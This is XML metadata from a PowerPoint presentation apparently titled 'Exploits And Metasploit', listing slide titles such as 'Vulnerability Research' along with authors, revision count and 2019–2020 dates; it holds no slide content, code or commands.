<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <TotalTime>26908</TotalTime>
  <Words>636</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>79</Paragraphs>
  <Slides>15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1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>Personalizar design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerability Research (Pesquisas de Vulnerabilidades)</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research</vt:lpstr>
      <vt:lpstr>Vulnerability Research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Exploits And Metasploit</dc:title>
  <dc:creator>shai</dc:creator>
  <cp:lastModifiedBy>Yehda Rosenberg</cp:lastModifiedBy>
  <cp:revision>92</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T08:36:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-15T06:56:46Z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0x010100D56E03BE3544194A9711D8E727977D0B</vt:lpwstr>
  </property>
</Properties>
</file>